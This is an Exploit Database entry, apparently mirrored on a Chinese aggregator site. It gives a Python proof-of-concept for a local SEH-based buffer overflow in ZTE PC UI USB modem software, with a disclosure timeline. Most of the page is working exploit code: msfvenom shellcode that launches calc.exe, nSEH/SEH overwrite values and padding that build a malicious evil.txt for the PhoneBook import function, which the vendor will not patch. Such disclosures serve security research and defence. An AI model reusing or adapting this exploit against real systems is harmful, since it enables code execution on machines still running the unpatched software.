ZTE PC UI USB Modem Software – Local Buffer Overflow

• Exploit Database
• 110 阅读

• 作者： R-73eN
  日期： 2015-09-17
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38219/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61

  #!/usr/bin/python -w # Title : ZTE PC UI USB MODEM SOFTWARE Buffer Overflow # Date : 17/09/2015 # Author : R-73eN # Tested on : Windows Xp sp3 on software Eagle Speed PCW_EAGLEALBp671A1V1.0.0B02 # Since all the PC UI based software shares the same source code they are all vulnerable.(Confirmed By ZTE) # The problem exists into the import function at PhoneBook Menu which doesn't # validate data and importing a malformed file leads to code execution. # # Triggering the Vulnerability # run this python script which will save an evil.txt file. # Open Eagle Speed, go to PhoneBook , click Import and select the evil.txt File # A calculator Should pop up. # # Disclosure Timeline: # [16/08/2015] - Vendor notified # [18/08/2015] - Vendor Responded asking for more details # [17/08/2015] - Vendor Responded that will not release a patch since the product is at end of life. # # Solution: # Don't import unknown text file. # # Video - https://www.youtube.com/watch?v=jbv1L4TrHTY #   banner = "" banner +="_________ __\n" banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n" banner +="| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |\n" banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n" banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner   shellcode ="" #msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x20\x3f" shellcode += "\xba\x49\xc7\x99\xe5\xda\xd7\xd9\x74\x24\xf4\x5b\x29" shellcode += "\xc9\xb1\x31\x83\xc3\x04\x31\x53\x0f\x03\x53\x46\x25" shellcode += "\x6c\x19\xb0\x2b\x8f\xe2\x40\x4c\x19\x07\x71\x4c\x7d" shellcode += "\x43\x21\x7c\xf5\x01\xcd\xf7\x5b\xb2\x46\x75\x74\xb5" shellcode += "\xef\x30\xa2\xf8\xf0\x69\x96\x9b\x72\x70\xcb\x7b\x4b" shellcode += "\xbb\x1e\x7d\x8c\xa6\xd3\x2f\x45\xac\x46\xc0\xe2\xf8" shellcode += "\x5a\x6b\xb8\xed\xda\x88\x08\x0f\xca\x1e\x03\x56\xcc" shellcode += "\xa1\xc0\xe2\x45\xba\x05\xce\x1c\x31\xfd\xa4\x9e\x93" shellcode += "\xcc\x45\x0c\xda\xe1\xb7\x4c\x1a\xc5\x27\x3b\x52\x36" shellcode += "\xd5\x3c\xa1\x45\x01\xc8\x32\xed\xc2\x6a\x9f\x0c\x06" shellcode += "\xec\x54\x02\xe3\x7a\x32\x06\xf2\xaf\x48\x32\x7f\x4e" shellcode += "\x9f\xb3\x3b\x75\x3b\x98\x98\x14\x1a\x44\x4e\x28\x7c" shellcode += "\x27\x2f\x8c\xf6\xc5\x24\xbd\x54\x83\xbb\x33\xe3\xe1" shellcode += "\xbc\x4b\xec\x55\xd5\x7a\x67\x3a\xa2\x82\xa2\x7f\x5c" shellcode += "\xc9\xef\x29\xf5\x94\x65\x68\x98\x26\x50\xae\xa5\xa4" shellcode += "\x51\x4e\x52\xb4\x13\x4b\x1e\x72\xcf\x21\x0f\x17\xef" shellcode += "\x96\x30\x32\x8c\x79\xa3\xde\x7d\x1c\x43\x44\x82"   filename="evil.txt" nSEH = "\xEB\x06\x90\x90" SEH = "\xab\x11\x9f\x0f" buffer = "A" * 3136 + nSEH + SEH + shellcode + "D" * (2856 - len(shellcode)) textfile = open(filename , 'w') textfile.write(buffer) textfile.close() print "[+] Evil.txt created successfully [+]"